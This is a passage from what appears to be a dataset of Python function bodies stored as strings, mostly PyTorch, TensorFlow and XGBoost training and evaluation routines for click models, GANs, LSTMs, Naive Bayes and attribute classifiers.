i > 0:\n CLICK_ = torch.distributions.Categorical(logit).sample()\n logits = torch.cat([logits, logit], dim=1)\n values = torch.cat([values, value], dim=1)\n CLICKS_ = torch.cat([CLICKS_, CLICK_], dim=1)\n\n if self.use_cuda:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype, device=torch.device('cuda')), CLICKS_), dim=1)\n else:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype), CLICKS_), dim=1)\n\n '''update discriminator'''\n for _ in range(self.args.k):\n self.discrim.train()\n self.discrim_optimizer.zero_grad()\n g_o, _ = self.discrim(QIDS, UIDS, VIDS, CLICKS_)\n g_o_target = torch.ones((QIDS.shape[0], g_o.shape[1]))\n e_o, _ = self.discrim(QIDS, UIDS, VIDS, CLICKS)\n e_o_target = torch.zeros((QIDS.shape[0], e_o.shape[1]))\n if self.use_cuda:\n 
g_o_target, e_o_target = g_o_target.cuda(), e_o_target.cuda()\n \n discrim_loss = self.discrim_criterion(g_o, g_o_target) + self.discrim_criterion(e_o, e_o_target)\n discrim_loss.backward()\n self.discrim_optimizer.step()\n self.writer.add_scalar('train/d_loss', discrim_loss.data, self.global_step)\n\n '''estimate advantage'''\n with torch.no_grad():\n self.discrim.eval()\n rewards = -torch.log(self.discrim(QIDS, UIDS, VIDS, CLICKS_)[0])\n # print(rewards.shape, values.shape)\n #print(tensor_type)\n #exit(0)\n deltas = torch.zeros(rewards.shape)\n advantages = torch.zeros(rewards.shape)\n prev_value = torch.zeros(rewards.shape[0])\n prev_advantage = torch.zeros(rewards.shape[0])\n if self.use_cuda:\n deltas, advantages = deltas.cuda(), advantages.cuda()\n prev_value, prev_advantage = prev_value.cuda(), prev_advantage.cuda()\n '''print(deltas)\n print(advantages)\n print(prev_value)\n print(prev_advantage)\n exit(0)'''\n\n for i in reversed(range(rewards.size(1))):\n deltas[:, i] = rewards[:, i] + self.gamma * prev_value - values[:, i]\n advantages[:, i] = deltas[:, i] + self.gamma * self.tau * prev_advantage\n prev_value = values[:, i]\n prev_advantage = advantages[:, i]\n\n returns = values + advantages\n advantages = (advantages - advantages.mean()) / (advantages.std() + MINF)\n # advantages = (returns - returns.mean())/returns.std()\n\n fixed_log_probs = torch.distributions.Categorical(logits).log_prob(CLICKS_[:, 1:])\n\n '''PPO update'''\n self.policy.train()\n optim_batchsize = 512\n optim_iter_num = int(math.ceil(QIDS.shape[0] / optim_batchsize))\n if self.use_cuda:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype, device=torch.device('cuda')), CLICKS_), dim=1)\n else:\n CLICKS_ = torch.cat((torch.zeros((CLICKS_.shape[0], 1), dtype=CLICKS_.dtype), CLICKS_), dim=1)\n for _ in range(self.args.g_step):\n perm = np.arange(QIDS.shape[0])\n np.random.shuffle(perm)\n\n QIDS, UIDS, VIDS, PRE_CLICKS, CLICKS, CLICKS_, advantages, returns, fixed_log_probs = \\\n QIDS[perm].clone(), UIDS[perm].clone(), VIDS[perm].clone(), PRE_CLICKS[perm].clone(), \\\n CLICKS[perm].clone(), CLICKS_[perm].clone(), advantages[perm].clone(), returns[perm].clone(), fixed_log_probs[perm].clone()\n\n #print(QIDS)\n #exit(0)\n\n for i in range(optim_iter_num):\n ind = slice(i * optim_batchsize, min((i + 1) * optim_batchsize, QIDS.shape[0]))\n qids_b, uids_b, vids_b, pclicks_b, clicks_b, clicks__b, advantage_b, returns_b, fixed_log_probs_b = \\\n QIDS[ind], UIDS[ind], VIDS[ind], CLICKS_[ind, :-1], CLICKS[ind], CLICKS_[ind, 2:], \\\n advantages[ind], returns[ind], fixed_log_probs[ind]\n\n logits, values_pred, _, _ = self.policy(qids_b, uids_b, vids_b, pclicks_b)\n dist = torch.distributions.Categorical(logits)\n\n\n '''update critic'''\n value_loss = (values_pred - returns_b).pow(2).mean()\n '''optimizer policy'''\n log_probs_b = dist.log_prob(clicks__b)\n ratio = torch.exp(log_probs_b - fixed_log_probs_b)\n surr1 = ratio * advantage_b\n surr2 = torch.clamp(ratio, 1.0 - self.clip_epsilon, 1.0 + self.clip_epsilon) * advantage_b\n policy_surr = -torch.min(surr1, surr2).mean()\n pe = dist.entropy().mean()\n loss = value_loss + self.alpha * policy_surr - self.beta * pe\n\n self.policy_optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(self.policy.parameters(), 40)\n self.policy_optimizer.step()\n g_loss, _ = self.compute_loss(logits, clicks_b)\n\n self.writer.add_scalar('train/g_loss', g_loss.data, self.global_step)\n self.writer.add_scalar('train/g_valueloss', 
value_loss.data, self.global_step)\n self.writer.add_scalar('train/g_policysurr', policy_surr.data, self.global_step)\n self.writer.add_scalar('train/g_entropy', pe.data, self.global_step)\n\n if check_point > 0 and self.global_step % check_point == 0:\n self.save_model(save_dir, save_prefix)\n if self.global_step >= num_steps:\n exit_tag = True\n\n return max_metric_value, exit_tag, metric_save, patience", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def trainFreezeBN(self):\n\t\tprint(\"Freezing Mean/Var of BatchNorm2D.\")\n\t\tprint(\"Freezing Weight/Bias of BatchNorm2D.\")\n\t\tfor m in self.modules():\n\t\t\tif isinstance(m, nn.BatchNorm2d):\n\t\t\t\tm.eval()\n\t\t\t\tm.weight.requires_grad = False\n\t\t\t\tm.bias.requires_grad = False", "def test_generate_nb_testing(self):\n pass", "def run_epoch(data_iter, model, loss_compute, ctx):\r\n start = time.time()\r\n total_tokens = 0\r\n total_loss = 0\r\n tokens = 0\r\n for i, batch in enumerate(data_iter):\r\n out = model(batch.src, batch.trg, batch.src_mask, batch.trg_mask)\r\n loss = loss_compute(out, batch.trg_y, batch.ntokens)\r\n total_loss += loss\r\n total_tokens += batch.ntokens\r\n tokens += batch.ntokens\r\n if i % 50 == 1:\r\n elapsed = time.time() - start\r\n ctx.logger.info(\"Epoch Step: %d Loss: %f Tokens per Sec: %f\",\r\n i, loss / batch.ntokens, tokens / elapsed)\r\n start = time.time()\r\n tokens = 0\r\n return total_loss / total_tokens", "def evaluate(epoch_number):\r\n model.eval() # turn on the eval() switch to disable dropout\r\n total_loss = 0\r\n total_correct = 0\r\n total_spl = 0\r\n total_xrl = 0\r\n total_Xrl = 0\r\n total_Yrl = 0\r\n total_cl = 0\r\n total_ol = 0\r\n Ysave = []\r\n for batch, i in enumerate(range(0, len(data_val), args.batch_size)):\r\n data, targets, lenth = package(data_val[i:min(len(data_val), i+args.batch_size)], volatile=True)\r\n if args.cuda:\r\n data = data.cuda()\r\n targets = targets.cuda()\r\n hidden = model.init_hidden(data.size(1))\r\n x, y, x_re, X, Y, Y_fromX, X_fromY, pred, outp, outp_fromY = model.forward(data, hidden,lenth, \"eval\",epoch_number)\r\n Ysave.append( (Y.cpu(), pred.cpu(), targets.cpu()) )\r\n output_flat = pred.view(data.size(1), -1)\r\n loss, sparse_loss, x_re_loss, X_re_loss, Y_re_loss, class_loss, outp_loss= \\\r\n criterion(x, y, x_re, X, Y, Y_fromX, X_fromY, pred, targets, data.size(1), outp, outp_fromY, lenth, epoch_number)\r\n total_loss += loss.data\r\n total_spl += sparse_loss.data\r\n total_xrl += x_re_loss.data\r\n total_Xrl += X_re_loss.data\r\n total_Yrl += Y_re_loss.data\r\n total_cl += class_loss.data\r\n total_ol += outp_loss.data\r\n\r\n prediction = torch.max(output_flat, 1)[1]\r\n total_correct += torch.sum((prediction == targets).float())\r\n\r\n ave_loss = total_loss / (len(data_val) // args.batch_size)\r\n ave_spl = total_spl / (len(data_val) // args.batch_size)\r\n ave_xrl = total_xrl / (len(data_val) // args.batch_size)\r\n ave_Xrl = total_Xrl / (len(data_val) // args.batch_size)\r\n ave_Yrl = total_Yrl / (len(data_val) // args.batch_size)\r\n ave_cl = total_cl / (len(data_val) // args.batch_size)\r\n ave_ol = total_ol / (len(data_val) // args.batch_size)\r\n\r\n if epoch_number is 15:\r\n f = open(\"../Y.pkl\",\"wb\")\r\n pkl.dump(Ysave, f)\r\n f.close()\r\n return ave_loss, 
total_correct.data[0] / len(data_val), ave_spl, ave_xrl, ave_Xrl,ave_Yrl, ave_cl, ave_ol", "def learn(self, Xtrain, ytrain):\n\n ### YOUR CODE HERE\n \n self.numfeatures = Xtrain.shape[1]\n numsamples = Xtrain.shape[0]\n #print (self.numfeatures)\n count = 0\n for i in ytrain:\n if (i>count):\n count+=1\n self.numclasses = count + 1\n \n if(self.params['usecolumnones']==False):\n b = np.ones((numsamples, self.numfeatures-1))\n b = Xtrain[:,:-1]\n Xtrain = b\n self.numfeatures -= 1\n # print(Xtrain.shape[1])\n\n ### END YOUR CODE\n\n origin_shape = (self.numclasses, self.numfeatures)\n self.means = np.zeros(origin_shape)\n self.stds = np.zeros(origin_shape)\n\n ### YOUR CODE HERE\n countclass = np.zeros(self.numclasses)\n for i in range (0, numsamples):\n k = int(ytrain[i])\n countclass[k] += 1\n for j in range (0, self.numfeatures):\n self.means[k][j]+=Xtrain[i][j]\n \n for i in range (0, self.numclasses):\n #np.true_divide(self.means[i], countclass[i])\n for j in range (0, self.numfeatures):\n self.means[i][j] = self.means[i][j]/(countclass[i]+1e-8)\n \n self.yprob = np.true_divide(countclass, numsamples)\n \n for i in range (0, numsamples):\n k = int(ytrain[i])\n for j in range (0, self.numfeatures):\n self.stds[k][j]+= (Xtrain[i][j] - self.means[k][j])**2\n # print (self.stds)\n \n for i in range (0, self.numclasses):\n #np.true_divide(self.stds[i], countclass[i])\n for j in range (0, self.numfeatures):\n self.stds[i][j] = self.stds[i][j]/(countclass[i]+1e-8)\n \n # print (self.means)\n # print (self.stds)\n ### END YOUR CODE\n\n assert self.means.shape == origin_shape\n assert self.stds.shape == origin_shape", "def compute_test():\n model.eval()\n sets = list(features.keys())\n for dset, loaders in zip(sets, [train_loaders, val_loaders, test_loaders]):\n final_specific_loss = 0\n final_total_loss = 0\n for loader in loaders:\n loader_total_loss = 0\n loader_specific_loss = 0\n for data in loader:\n output = model(data.to(device))\n specific_loss = specific_loss_torch_geom(output, (data.pos, data.y),\n data.batch, batch_sizes[dset]).detach()\n loader_specific_loss += specific_loss\n loader_total_loss += torch.mean(specific_loss)\n # Average the loss over each loader\n loader_specific_loss /= len(loader)\n loader_total_loss /= len(loader)\n # Average the loss over the different loaders\n final_specific_loss += loader_specific_loss / len(loaders)\n final_total_loss += loader_total_loss / len(loaders)\n del output, loader_specific_loss\n\n print(\"Test set results \", dset, \": loss= {:.4f}\".format(final_total_loss))\n print(dset, \": \", final_specific_loss)\n print(\"Results in log scale\", np.log10(final_specific_loss.detach().cpu()),\n np.log10(final_total_loss.detach().cpu().numpy()))\n if args.wandb:\n wandb.run.summary[\"test results\"] = np.log10(final_specific_loss.detach().cpu())\n # free unnecessary data\n\n\n final_specific_numpy = np.log10(final_specific_loss.detach().cpu())\n del final_total_loss, final_specific_loss\n torch.cuda.empty_cache()\n return final_specific_numpy", "def test_rnnslu(**kwargs):\n # process input arguments\n param = {\n 'fold': 3,\n 'lr': 0.1,\n 'verbose': True,\n 'decay': False,\n 'win': 3,\n 'nhidden': 300,\n 'seed': 345,\n 'emb_dimension': 50,\n 'nepochs': 60,\n 'normal': False,\n 'folder':'../result',\n 'longdependence':None,\n 'optimization':'Adagrad'\n }\n param_diff = set(kwargs.keys()) - set(param.keys())\n if param_diff:\n raise KeyError(\"invalid arguments:\" + str(tuple(param_diff)))\n param.update(kwargs)\n\n if param['verbose']:\n for k,v 
in param.items():\n print(\"%s: %s\" % (k,v))\n\n # create result folder if not exists\n check_dir(param['folder'])\n\n # load the dataset\n print('... loading the dataset')\n train_set, valid_set, test_set, dic = load_data(param['fold'])\n\n # create mapping from index to label, and index to word\n idx2label = dict((k, v) for v, k in dic['labels2idx'].items()) # change label2index - index2label\n idx2word = dict((k, v) for v, k in dic['words2idx'].items()) # change words2index - index2words\n\n # unpack dataset\n train_lex, train_ne, train_y = train_set\n valid_lex, valid_ne, valid_y = valid_set\n test_lex, test_ne, test_y = test_set \n\n train_lex = train_lex + test_lex\n train_y = train_y + test_y\n train_ne = train_ne + test_ne\n\n vocsize = len(dic['words2idx']) # # of words\n nclasses = len(dic['labels2idx']) # # of classes \n nsentences = len(train_lex) # # training sample [a batch is all the words in a sentence]\n\n ## get the label for (input,output) for test and valid set \n groundtruth_valid = [map(lambda x: idx2label[x], y) for y in valid_y]\n words_valid = [map(lambda x: idx2word[x], w) for w in valid_lex]\n\n # instanciate the model\n numpy.random.seed(param['seed'])\n random.seed(param['seed'])\n \n\n print('... building the model')\n lstm = LSTM(\n nh=param['nhidden'],\n nc=nclasses,\n ne=vocsize,\n de=param['emb_dimension'],\n cs=param['win'],\n normal=param['normal'],\n longdependence = param['longdependence'],\n optimization = param['optimization']\n )\n\n ## build the model for mini-batch\n # train with early stopping on validation set\n print('... training')\n best_f1 = -numpy.inf\n param['clr'] = param['lr']\n \n for epoch in range(param['nepochs']):\n\n param['ce'] = epoch\n tic = timeit.default_timer()\n print('epoch %i out of %i' %(epoch,param['nepochs']) )\n \n for i, (x, y) in enumerate(zip(train_lex, train_y)):\n input_length = len(x)\n lstm.train(x, y, param['win'], param['clr'])\n print('[learning] epoch %i >> %2.2f%%' % (\n epoch, (i + 1) * 100. 
/ nsentences), end=' ')\n print('completed in %.2f (sec) <<\\r' % (timeit.default_timer() - tic), end='')\n\n # evaluation // back into the real world : idx -> words\n predictions_valid = [map(lambda x: idx2label[x],\n lstm.classify(numpy.asarray(\n contextwin(x, param['win'])).astype('int32')))\n for x in valid_lex]\n\n # evaluation // compute the accuracy using conlleval.pl\n res_valid = conlleval(predictions_valid,\n groundtruth_valid,\n words_valid,\n param['folder'] + '/current.valid.txt',\n param['folder'])\n\n if res_valid['f1'] > best_f1:\n\n best_f1 = res_valid['f1']\n\n if param['verbose']:\n print('NEW BEST: epoch', epoch,\n 'best test F1', res_valid['f1'])\n\n param['tf1'] = res_valid['f1']\n param['tp'] = res_valid['p']\n param['tr'] = res_valid['r']\n param['be'] = epoch\n else:\n if param['verbose']:\n print('')\n\n # learning rate decay if no improvement in 10 epochs\n if param['decay'] and abs(param['be']-param['ce']) >= 10:\n param['clr'] *= 0.5\n\n if param['clr'] < 1e-5:\n break\n \n\n print('BEST RESULT: epoch', param['be'],\n 'best test F1', param['tf1'],\n 'with the model', param['folder'])\n \n return lstm", "def __call__(self, epoch, update):\n ii=1\n count = 0\n list = []\n gradients_list = []\n metrics_list = []\n from_list = []\n step_list = []\n global_update_list = []\n while True:\n i, p = next(self.gen)\n if p.poll():\n grads = []\n for i, fs in enumerate(self.float_sizes):\n w = p.recv_bytes(fs * 4)\n grads.append(np.ndarray(self.shapes[i], np.float32, w))\n\n last_update, step, agnt_nr, metrics = p.recv()\n\n count += 1\n\n gradients_list.append(grads)\n metrics_list.append(metrics)\n from_list.append(agnt_nr)\n global_update_list.append(last_update)\n step_list.append(1)\n staleness = update - last_update\n else:\n ii += 1\n if ii % self.learners == 0:\n time.sleep(0.0001)\n if count == self.num:\n binning = 0\n for i in self.bins:\n if staleness >= i:\n binning += 1\n else:\n break\n self.bin_counts[binning] += 1\n logger.debug(\"staleness\", staleness, \"put in bin\", binning, flush=True)\n return gradients_list, from_list, global_update_list, step_list, metrics_list, binning, 2", "def run_cr_dblp(alpha=0.2, c=0.85, MaxIter=1000, epsilon=1e-15, q=121, s=0, d=19, k=10, dataset=\"../data/DBLP_NoN.npy\"):\n\n '''\n Load NoN data\n '''\n data = np.load(dataset).item()\n CoAuthorNets = data['CoAuthorNets']\n ConfNet = data['ConfNet']\n ConfDict = data['ConfDict']\n AuthorDict = data['AuthorDict']\n CoAuthorNetsID = data['CoAuthorNetsID']\n\n '''\n Rename networks\n '''\n G = sparse.csc_matrix(ConfNet) # the main network\n g = CoAuthorNets.shape[1]\n A = CoAuthorNets # the domain-specific networks\n A_ID = CoAuthorNetsID # the IDs of nodes in domain-specific networks\n\n '''\n Precomputation, this step only needs to be done once for a dataset\n '''\n PrecompFileName = 'Precomp_Values_DBLP.npy'\n\n if os.path.isfile(PrecompFileName):\n print(\"A precomputation file has been detected ...\")\n else:\n print(\"Precomputation starts ...\")\n Precomputation.precomputation(A, A_ID, G, PrecompFileName)\n\n print(\"Load the precomputation file ...\")\n data = np.load(PrecompFileName).item()\n I_n = data['I_n']\n Anorm = data['Anorm']\n Ynorm = data['Ynorm']\n\n '''\n Run CR\n '''\n # set initial scores\n start = time.time()\n\n vfunc = np.vectorize(lambda matrix: matrix.shape[0]) # define an element-wise operation\n DomainSizes = vfunc(A_ID) # the number of domain nodes in each domain-specific network\n\n e = np.array([]) # initialize query vector\n\n for i in 
range(g):\n\n tmp_e = np.zeros((DomainSizes[0, i],))\n\n if i == s:\n tmp_e[A_ID[0, i].ravel() == q] = 1 # use g to replace 1 if NoN size is large\n\n e = np.hstack((e, tmp_e))\n\n e = e.reshape(len(e), 1)\n e = sparse.csc_matrix(e)\n\n # CR\n [r, Objs, Deltas] = CR.cr(Anorm, Ynorm, I_n, e, alpha, c, MaxIter, epsilon)\n\n # sort ranking scores in the target domain-specific network\n st = np.sum(DomainSizes[0, 0:d])\n ed = np.sum(DomainSizes[0, 0:d+1])\n rd_idx = np.arange(st, ed)\n rd = r[rd_idx]\n\n Sort_rd = np.flip(np.sort(rd.todense().getA1()), axis=0)\n Sort_Idx = np.flip(np.argsort(rd.todense().getA1()), axis=0)\n\n TopKResults = Sort_Idx[0:k]\n TopKResults = A_ID[0, d][TopKResults, 0]\n\n end = time.time()\n Runtime = end - start\n\n print(\"The running time of CR is \" + str(Runtime) + \" seconds.\")\n\n TopKAuthorNames = AuthorDict[TopKResults - 1, 0]\n\n return TopKAuthorNames", "def train_and_score_xgb(network):\n\n df_all_train_x = pd.read_pickle('data/df_all_train_x.pkl.gz', compression='gzip')\n df_all_train_y = pd.read_pickle('data/df_all_train_y.pkl.gz', compression='gzip')\n df_all_train_actuals = pd.read_pickle('data/df_all_train_actuals.pkl.gz', compression='gzip')\n df_all_test_x = pd.read_pickle('data/df_all_test_x.pkl.gz', compression='gzip')\n df_all_test_y = pd.read_pickle('data/df_all_test_y.pkl.gz', compression='gzip')\n df_all_test_actuals = pd.read_pickle('data/df_all_test_actuals.pkl.gz', compression='gzip')\n\n train_y = df_all_train_y[0].values\n train_actuals = df_all_train_actuals[0].values\n train_log_y = safe_log(train_y)\n train_x = df_all_train_x.values\n test_actuals = df_all_test_actuals.values\n test_y = df_all_test_y[0].values\n test_log_y = safe_log(test_y)\n test_x = df_all_test_x.values\n\n # Use keras model to generate x vals\n mae_intermediate_model = load_model('models/mae_intermediate_model.h5')\n\n mae_vals_train = mae_intermediate_model.predict(train_x)\n mae_vals_test = mae_intermediate_model.predict(test_x)\n\n # train = xgb.DMatrix(mae_vals_train, label=train_log_y)\n # test = xgb.DMatrix(mae_vals_test)\n\n model = compile_model(network)\n\n print('\\rNetwork')\n\n for property in network:\n print(property, ':', network[property])\n logging.info('%s: %s' % (property, network[property]))\n\n\n eval_set = [(mae_vals_test, test_log_y)]\n model.fit(mae_vals_train, train_log_y, early_stopping_rounds=5, eval_metric='mae', eval_set=eval_set)\n # , verbose=False)\n\n # eval_set = [(test, test_log_y)]\n # xgb.train(network, train, num_boost_round=5000, evals=eval_set, early_stopping_rounds=5)\n\n\n predictions = model.predict(mae_vals_test)\n # predictions = xgb.predict(test)\n score = mean_absolute_error(test_log_y, predictions)\n\n print('\\rResults')\n\n best_round = model.best_iteration\n # best_round = xgb.best_iteration\n\n if np.isnan(score):\n score = 9999\n\n print('best round:', best_round)\n print('loss:', score)\n print('-' * 20)\n\n logging.info('best round: %d' % best_round)\n logging.info('loss: %.4f' % score)\n logging.info('-' * 20)\n\n return score", "def test_normalization(self):\n Number_of_tests = 1000\n low = -1000\n high = 1000\n for i in range(Number_of_tests):\n x = np.random.rand(100) * (high - low) + low\n y = aux_functions.softmax_base(x)\n result = np.sum(y)\n nptest.assert_almost_equal(result, 1.0)", "def train_step(self,\n x,\n y,\n b,\n w):\n\n statistics = dict()\n\n for i in range(self.bootstraps):\n fm = self.forward_models[i]\n fm_optim = self.forward_model_optims[i]\n\n with tf.GradientTape(persistent=True) as 
tape:\n\n # calculate the prediction error and accuracy of the model\n d = fm.get_distribution(x, training=True)\n nll = -d.log_prob(y)[:, 0]\n\n # evaluate how correct the rank fo the model predictions are\n rank_correlation = spearman(y[:, 0], d.mean()[:, 0])\n\n # build the total loss and weight by the bootstrap\n total_loss = tf.math.divide_no_nan(tf.reduce_sum(\n w[:, 0] * b[:, i] * nll), tf.reduce_sum(b[:, i]))\n\n grads = tape.gradient(total_loss, fm.trainable_variables)\n fm_optim.apply_gradients(zip(grads, fm.trainable_variables))\n\n statistics[f'oracle_{i}/train/nll'] = nll\n statistics[f'oracle_{i}/train/rank_corr'] = rank_correlation\n\n return statistics", "def calcError(net, net_labels, dataset_name, dataloader, dataset, doGPU):\n # note: net_labels is a list of pairs (RAP_name, PETA_name) of attribute names\n net_attr_nbr = len(net_labels)\n assert (net_attr_nbr == 49)\n \n total = 0\n correct = 0\n batch_nbr = 0\n per_attrib_total = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_correct = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_1_pred = torch.zeros([net_attr_nbr], dtype=torch.int64) # size [92]\n per_attrib_class_accuracy = torch.zeros([net_attr_nbr], dtype=torch.float) # size [92]\n if doGPU:\n per_attrib_total = per_attrib_total.cuda()\n per_attrib_correct = per_attrib_correct.cuda()\n per_attrib_1_pred = per_attrib_1_pred.cuda()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cuda()\n \n with torch.no_grad():\n # loop over batches\n # accumulate per-attribute and total number of correct predictions\n for i_batch, sample_batched in enumerate(dataloader):\n assert (sample_batched['image'].shape[1:] == (3,128,48)), \"wrong image size\"\n batch_nbr += 1\n real_batch_size = sample_batched['image'].shape[0]\n total += real_batch_size * net_attr_nbr\n per_attrib_total += real_batch_size # size [net_attr_nbr]\n assert (per_attrib_total.sum().item() == total)\n try:\n assert (batch_nbr == math.ceil(per_attrib_total[0].item()/Param_Batchsize))\n except AssertionError:\n ipdb.set_trace()\n pass\n\n\n # prepare data for prediction\n if doGPU:\n inp = Variable(sample_batched['image'].float().cuda())\n else:\n inp = Variable(sample_batched['image'].float())\n\n # retrieve ground truth\n dataset_lab_gt = sample_batched['label'] # shape == [50,NB_ATTRIB]\n\n # convert ground truth to model attributes\n if dataset_name == 'datasetRAPPETA':\n assert (dataset_lab_gt.shape[1] == 49)\n # no conversion needed, use ground truth as it is\n lab_gt = dataset_lab_gt\n elif dataset_name == 'datasetRAP':\n assert (dataset_lab_gt.shape[1] == 92)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_RAP = [rap_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_RAP):\n lab_gt[:,attr_idx] = dataset_lab_gt[:,dataset.index_of(attr_name)]\n elif dataset_name == 'datasetPETA':\n assert (dataset_lab_gt.shape[1] == 104)\n # note: in the line below dataset_lab_gt.shape[0] is better than \n # Param_Batchsize because the last batch may be incomplete\n lab_gt = torch.zeros((dataset_lab_gt.shape[0],net_attr_nbr), dtype=dataset_lab_gt.dtype)\n net_labels_PETA = [peta_label for rap_label,peta_label in net_labels]\n for attr_idx,attr_name in enumerate(net_labels_PETA):\n lab_gt[:,attr_idx] = 
dataset_lab_gt[:,dataset.index_of(attr_name)]\n else:\n print('Unknown dataset \\'' + dataset_name + '\\'')\n sys.exit(1)\n\n # 'format' ground truth for Torch\n lab_gtv = Variable(lab_gt)\n if doGPU:\n lab_gtv = lab_gtv.cuda()\n\n # do prediction\n logits = net.forward(inp) # output without Sigmoid\n predictions = (logits > 0).int() # size [50, net_attr_nbr]\n assert (net_attr_nbr == predictions.shape[1])\n\n # accumulate total number of correct predictions\n correct += (lab_gtv == predictions).sum()\n\n # accumulate per-attribute number of correct predictions\n per_batch_and_attrib_correct = (lab_gtv == predictions) # size [50, net_attr_nbr]\n #if doGPU:\n # per_batch_and_attrib_correct = per_batch_and_attrib_correct.cpu()\n per_attrib_correct += per_batch_and_attrib_correct.sum(0) # size [net_attr_nbr]\n assert (per_attrib_correct.sum().item() == correct)\n\n # accumulate number of 1 predictions for each attribute\n per_attrib_1_pred += predictions.sum(0) # size [net_attr_nbr]\n\n # accumulate for class-accuracy\n per_batch_and_attrib_1_good_prediction = (predictions.byte() * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_good_prediction = ((1 - predictions.byte()) * per_batch_and_attrib_correct).sum(0) #size [net_attr_nbr]\n assert torch.equal(per_batch_and_attrib_1_good_prediction + per_batch_and_attrib_0_good_prediction, per_batch_and_attrib_correct.sum(0))\n per_batch_and_attrib_1_ground_truth = lab_gtv.sum(0) #size [net_attr_nbr]\n per_batch_and_attrib_0_ground_truth = (1 - lab_gtv).sum(0) #size [net_attr_nbr]\n try:\n assert torch.equal(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth, torch.tensor([real_batch_size] * net_attr_nbr).cuda())\n except AssertionError:\n print(\"per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth=\")\n print(per_batch_and_attrib_1_ground_truth + per_batch_and_attrib_0_ground_truth)\n ipdb.set_trace()\n pass\n\n per_batch_and_attrib_recall_1 = per_batch_and_attrib_1_good_prediction.float() / per_batch_and_attrib_1_ground_truth.float() #size [net_attr_nbr]\n # nan values appear when ground_truth number of 1 value is 0\n # in this case, good_prediction can not be different of 0\n # (there can not be a good prediction of 1 because there is not\n # any 1 in the ground truth)\n # so a nan appears only when recall = 0 good pred / 0 case in ground truth\n # so recall=nan can be safely replaced by a recall=1\n person.replace_nan_by_one(per_batch_and_attrib_recall_1)\n per_batch_and_attrib_recall_0 = per_batch_and_attrib_0_good_prediction.float() / per_batch_and_attrib_0_ground_truth.float() #size [net_attr_nbr]\n person.replace_nan_by_one(per_batch_and_attrib_recall_0)\n # class_accuracy = mean(recall_of_0, recall_of_1)\n per_batch_and_attrib_class_accuracy = (per_batch_and_attrib_recall_0 + per_batch_and_attrib_recall_1) / 2.0 #size [net_attr_nbr]\n per_attrib_class_accuracy += per_batch_and_attrib_class_accuracy #size [net_attr_nbr]\n\n assert (total == (dataloader.dataset.__len__() * net_attr_nbr))\n \n if doGPU:\n per_attrib_total = per_attrib_total.cpu()\n per_attrib_correct = per_attrib_correct.cpu()\n per_attrib_1_pred = per_attrib_1_pred.cpu()\n per_attrib_class_accuracy = per_attrib_class_accuracy.cpu()\n\n # compute per-attribute and global average prediction error\n err = (1.0-correct.item()/total)\n per_attrib_err = (1.0 - (per_attrib_correct.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float))) # size [net_attr_nbr]\n 
np.testing.assert_allclose(per_attrib_err.mean().item(), err, rtol=1e-5)\n\n # compute per-attribute number of 1 predictions\n per_attrib_1_pred_rate = 100 * (per_attrib_1_pred.to(dtype=torch.float) / per_attrib_total.to(dtype=torch.float)) # size [net_attr_nbr]\n\n # compute mean class_accuracy over batches\n per_attrib_class_accuracy = per_attrib_class_accuracy * 1.0 / batch_nbr \n\n return err, per_attrib_err, per_attrib_1_pred_rate, per_attrib_class_accuracy", "def train(nz=100, lr=0.0002, batchSize=64, epoch=10, outDir='../Experiment/wgan'):\n\t# load the images for training\n\tif opts.celeba : \n\t\txTrain = load_CelebA()\n\tif opts.mnist : \n\t\txTrain,_,_,_,_,_ = load_MNIST()\n\tprint 'Images for training -- shape:{}, min:{}, max:{} '.format(np.shape(xTrain), np.min(xTrain), np.max(xTrain))\n\n\ttrain_fns, test_fns, G, D = prep_train(nz=nz, lr=lr)\n\n\tsn,sc,sx,sy=np.shape(xTrain)\n\tbatches=int(np.floor(float(sn)/batchSize))\n\n\t#keep training info\n\tg_cost=[]\n\td_cost=[]\n\n\ttimer=time.time()\n\t#Train D (outerloop)\n\tprint 'epoch \\t batch \\t cost G \\t cost D \\t time (s)'\n\tfor e in range(epoch):\n\t\t#Do for all batches\n\t\tfor b in range(batches):\n\t\t\tZ = np.random.normal(loc=0.0, scale=1.0, size=(sn,nz)).astype(floatX) \n\t\t\tcost_D=train_fns['dis'](xTrain[b*batchSize:(b+1)*batchSize],Z[b*batchSize:(b+1)*batchSize])\n\t\t\tcost_G=train_fns['gen'](Z[b*batchSize:(b+1)*batchSize])\n\t\t\tprint e,'\\t',b,'\\t',cost_G,'\\t', cost_D,'\\t', time.time()-timer\n\t\t\ttimer=time.time()\n\t\t\tg_cost.append(cost_G)\n\t\t\td_cost.append(cost_D)\n\n\n\t#save plot of the cost\n\tplt.plot(range(batches*epoch),g_cost, label=\"G\")\n\tplt.plot(range(batches*epoch),d_cost, label=\"D\")\n\tplt.legend()\n\tplt.xlabel('epoch')\n\tplt.savefig(os.path.join(outDir,'cost_regular.png'))\n\n\treturn train_fns, test_fns, G, D", "def evaluate_hmdb51_fusion():\n vlen = 0\n ob_suffix = '-max.feat.npy.gz'\n fv_suffix = '_fv.npy.gz'\n ob_root = '/home/syq/research_final/data/features/ob_hmdb51_pooled_python/'\n fv_root = 